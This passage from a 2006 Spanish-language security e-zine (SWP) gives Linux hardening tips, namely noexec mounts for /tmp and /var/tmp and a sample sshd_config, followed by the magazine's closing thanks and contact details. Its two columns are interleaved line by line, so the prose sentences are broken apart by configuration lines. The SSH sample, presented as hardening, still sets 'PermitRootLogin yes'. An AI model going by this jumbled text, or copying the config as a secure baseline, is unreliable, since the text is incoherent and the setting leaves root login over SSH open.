Port 22 Este es un prime alcance de la documentación que
/dev/sda5 /tmp ext3 rw,nosuid,noexec,nodev 2 2 Protocol 2
/dev/sda6 /var ext3 defaults 0 1 estoy preparando sobre este tema de seguridad en
/dev/sda7 /var/tmp ext3 rw,nosuid,noexec,nodev 0 1 ListenAddress 0.0.0.0
Donde el parámetro: noexec evitara la ejecución de aplicaciones en los SyslogFacility AUTH
Linux, personalmente no lo considero terminado
directorios con lectura y escritura para todos como lo son: “/tmp”,
“/var/tmp”. LogLevel INFO como primera parte por lo que lo seguiré actuali-
PermitRootLogin yes zando en una versión online que estará publicada
StrictModes yes
en el website de SWP, y la continuación de la
Acceso remoto y transferencia de archivos: Para MaxAuthTries 2
misma que saldra en la siguiente E-Zine ;)
la administración remota del servidor SSH es el PubkeyAuthentication yes

protocolo a usar y debe ser debidamente configu- AuthorizedKeysFile .ssh/authorized_keys Agradecimientos a el Team de SWP, amigos del
PasswordAuthentication no
rado de este para la transferencia de archivos se grupo que nos brindan su apoyo y a todos ustedes
PermitEmptyPasswords no
recomienda el uso de SFTP que esta implementado lectores .
Subsystem sftp /usr/lib/misc/sftp-server
en el daemon SSH, asi como también la generación
de llaves SSH para una mayor seguridad y limita-
-- Renkho --

22 Lo que hagas en la vida, tendrá eco en la eternidad.


S E Q U O I A C L U B

Agradecimientos Finales
Hoy SWP, quiere agradecer a nuestros lectores y amigos, que a lo largo de estos 5
años nos han acompañado y apoyado con su amistad, sus comentarios y sus
palabras de apoyo, Gracias por ese estímulo constante que es el que nos incita a
seguir con este proyecto llamado SWP. Ah... y gracias a los amigos de cuzqueña
por la foto de wallpaper que aparece aquí abajo ;)

SWP - SECURITY WARI PROJECTS Edición especial - Julio 2006

Como ubicarnos
Escribenos a:

Securitywariprojects@gmail.com

Visitanos en:

http://www.swp-scene.org/

O inscribete en nuestra lista:

http://groups.google.com/group/swp-scene/

Revista hecha en el Perú

También podría gustarte